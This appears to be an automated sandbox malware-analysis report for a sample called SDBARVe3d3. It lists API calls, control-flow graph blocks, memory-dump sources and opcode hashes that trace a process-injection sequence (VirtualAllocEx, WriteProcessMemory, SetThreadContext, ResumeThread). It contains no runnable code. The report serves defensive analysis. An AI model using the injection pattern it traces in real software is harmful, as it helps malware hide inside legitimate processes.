                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Create
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 2289755597-2367252532

                                                                                                                                    Control-flow Graph: CreateActCtxA (block 51644d4-51659e1)
                                                                                                                                    APIs
                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 051659D1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Create
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 2289755597-2367252532

                                                                                                                                    Control-flow Graph: WriteProcessMemory (block 72946e6-7294725)
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07294718
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 3559483778-2367252532

                                                                                                                                    Control-flow Graph: WriteProcessMemory (block 72946e6-7294725)
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07294718
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 3559483778-2367252532

                                                                                                                                    Control-flow Graph: ReadProcessMemory (block 7294770-7294805)
                                                                                                                                    APIs
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072947F8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 1726664587-2367252532

                                                                                                                                    Control-flow Graph: Wow64SetThreadContext (block 729454b-729457b)
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0729456E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 983334009-2367252532
                                                                                                                                    APIs
                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0516D9D7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 3793708945-2367252532
                                                                                                                                    APIs
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072947F8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 1726664587-2367252532
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0729456E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 983334009-2367252532
                                                                                                                                    APIs
                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0516D9D7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 3793708945-2367252532
                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07294636
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 4275171209-2367252532
                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07294636
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 4275171209-2367252532
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 947044025-2367252532
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 947044025-2367252532
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0516B2BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleModule
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 4139908857-2367252532
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07296CBD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 410705778-2367252532
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07296CBD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 410705778-2367252532
                                                                                                                                    • Opcode ID: d2d53ba79857c177ab263bfbf70196c629b90640baa7a82c8d8f60da4224226b
                                                                                                                                    • Instruction ID: c1ae8339e70093db3dfc02cf0df2e7092054888693d42a12e2966387cb319605
                                                                                                                                    • Opcode Fuzzy Hash: d2d53ba79857c177ab263bfbf70196c629b90640baa7a82c8d8f60da4224226b
                                                                                                                                    • Instruction Fuzzy Hash: 7A11F2B5800349DFDB10DF9AC889BDEBBF8EB48320F14881AE558A7300C375A544CFA5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692282204.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_e9d000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cd7ebf2db242a1af68d09b6d45b56c406367ce82a8ad80c443635432cdbf1319
                                                                                                                                    • Instruction ID: ec4822a67da35c6fa5690d51f3a52dd9a923d90664bcd0b42621036c06f6ed53
                                                                                                                                    • Opcode Fuzzy Hash: cd7ebf2db242a1af68d09b6d45b56c406367ce82a8ad80c443635432cdbf1319
                                                                                                                                    • Instruction Fuzzy Hash: BD212871508204DFDF05DF14DDC0B2ABF65FB94324F20C169D9095B256C336E856C6A2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692686203.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10bd000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1f31862b40ad6323c0c4160248301e75ddc4c1b99b32e41fe54c8394091968ff
                                                                                                                                    • Instruction ID: d19611b9d146c5d2974e4616c879b4fedd6c6e7ce0d84e18114e766d8b125fff
                                                                                                                                    • Opcode Fuzzy Hash: 1f31862b40ad6323c0c4160248301e75ddc4c1b99b32e41fe54c8394091968ff
                                                                                                                                    • Instruction Fuzzy Hash: 70212271614200DFCB15DF98D9C4B6AFFA5EB88318F20C5ADE98A4B256C33AD447CB61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692686203.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10bd000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 45924cdc14c5beee3d9ef0b7361b5fa1e9b58a8b7b6d502d5bd28ce64be6339f
                                                                                                                                    • Instruction ID: 800924b0d7ab34c0ced07d83aeeaeea3825d5a0a2437e36d77bc8d9471d0ff5a
                                                                                                                                    • Opcode Fuzzy Hash: 45924cdc14c5beee3d9ef0b7361b5fa1e9b58a8b7b6d502d5bd28ce64be6339f
                                                                                                                                    • Instruction Fuzzy Hash: 2B212971504240EFDB05DF98D5C0B6AFFA5FB94328F20C5ADD9894B256C336D846CB61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692686203.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10bd000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6ec627737c72ebf0be575fd3678bb0d01979ac911e8fce1a5ebf27f0bf695c29
                                                                                                                                    • Instruction ID: dee948e5d5e0957d1fc3baed9601f58d4d2648c21173e58b71d4bbb22aa177f9
                                                                                                                                    • Opcode Fuzzy Hash: 6ec627737c72ebf0be575fd3678bb0d01979ac911e8fce1a5ebf27f0bf695c29
                                                                                                                                    • Instruction Fuzzy Hash: 772153755083809FDB12CF54D9D4711BFB1EB46214F28C5DAD8898F2A7C33A9856CB62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692282204.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_e9d000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                    • Instruction ID: dc4809fb5d0942b7945b0249c5f9bf69af0d5c160a399ef89d253f91a1cd0b5f
                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                    • Instruction Fuzzy Hash: F5110372404240DFCF12CF00D9C4B16BF71FB94328F24C2A9D8090B256C33AE85ACBA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692686203.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                    • API String ID: 0-1598597984

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:1.2%
                                                                                                                                    Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                    Signature Coverage:7.5%
                                                                                                                                    Total number of Nodes:146
                                                                                                                                    Total number of Limit Nodes:13

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 91 417793-4177af 92 4177b7-4177bc 91->92 93 4177b2 call 42f323 91->93 94 4177c2-4177d0 call 42f923 92->94 95 4177be-4177c1 92->95 93->92 98 4177e0-4177f1 call 42dd83 94->98 99 4177d2-4177dd call 42fbc3 94->99 104 4177f3-417807 LdrLoadDll 98->104 105 41780a-41780d 98->105 99->98 104->105
                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                    • Opcode ID: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                                                                                    • Instruction ID: 8c201cb86210103d8ff0389f06be1b6184587a7a4bbc6cbf00069c90d1d8dc7c
                                                                                                                                    • Opcode Fuzzy Hash: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                                                                                    • Instruction Fuzzy Hash: F3015EB5E0020DBBDB10DAE1DC42FDEB7789B14308F4041AAE91897280FA34EB488B95

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 121 42c633-42c66c call 4047d3 call 42d873 NtClose
                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C667
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                                                                                    • Instruction ID: c58c7d579e4e2bacd6c01519c7e0221e1a66a8a060063ee453bb1f2e55cecb1d
                                                                                                                                    • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                                                                                    • Instruction Fuzzy Hash: 67E0D632600204BBE220AA5AEC02F8BB3ACCBC5714F00401AFA0CA7242C270B91086F5
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                                                    • Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
                                                                                                                                    • Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                                                    • Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                                                    • Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
                                                                                                                                    • Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                                                    • Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                                                    • Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
                                                                                                                                    • Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                                                    • Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                                                                    • Instruction ID: b4217b1437d65659a256b99a2095463e0f44cce8bd75ab5093f7e387ccb1db6f
                                                                                                                                    • Opcode Fuzzy Hash: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                                                                    • Instruction Fuzzy Hash: EB90023160960402D60071588518706500597D0201F66C431A0424578DC7958B5166A3

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 1836367815-3456940251
                                                                                                                                    • Opcode ID: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                                                                                                    • Instruction ID: 874110b21b3390a429e1172821fe310f6061561dc3fbdce207ccc568e88ba2fc
                                                                                                                                    • Opcode Fuzzy Hash: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                                                                                                    • Instruction Fuzzy Hash: 06115972E002587BDB119AE28C41DEFBB7DAF81358F04805AF90467241D2784E4747A5

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 1836367815-3456940251
                                                                                                                                    • Opcode ID: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                                                                                                    • Instruction ID: c1e20e2142e366b389da3563046297cec7b91a3900e043a758beaaf28deb081d
                                                                                                                                    • Opcode Fuzzy Hash: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                                                                                                    • Instruction Fuzzy Hash: 0A01DB71E0021C7AEB10ABD19C81DEF7B7CEF81798F448069FA0467141D6785E0647A5

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 30 413fdf-413feb 30->30 31 413fed-413ff0 30->31 32 414053-414055 31->32 33 413ff2-413ffc 31->33 34 41405b-41408d call 404743 call 424e93 32->34 35 414056 call 417793 32->35 33->32 40 4140ad-4140b3 34->40 41 41408f-41409e PostThreadMessageW 34->41 35->34 41->40 42 4140a0-4140aa 41->42 42->40
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 0-3456940251
                                                                                                                                    • Opcode ID: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                                                                                                    • Instruction ID: bd3507925f1ca423312bb13a029e2d8f4e8582ed727c1f867d54eba86e7c9970
                                                                                                                                    • Opcode Fuzzy Hash: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                                                                                                    • Instruction Fuzzy Hash: 0A0147B6A01249BEDB105BA24C81CEF7B7DDED2758B048066F904E7241D6784E4647BA

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 43 42c993-42c9d4 call 4047d3 call 42d873 RtlFreeHeap
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C9CF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID: =eA
                                                                                                                                    • API String ID: 3298025750-3399696693
                                                                                                                                    • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                                                                                    • Instruction ID: 5bf54a144608e309584a604ebbd06080e81bb27e9496a35fdb293cb900648e28
                                                                                                                                    • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                                                                                    • Instruction Fuzzy Hash: EDE065B66143047BD610EE9AEC45FAB33ACEFC9750F00441AFA19A7242D770BD118BB9

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 116 42c943-42c984 call 4047d3 call 42d873 RtlAllocateHeap
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(?,0041E57E,?,?,00000000,?,0041E57E,?,?,?), ref: 0042C97F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0

                                                                                                                                    Control-flow Graph

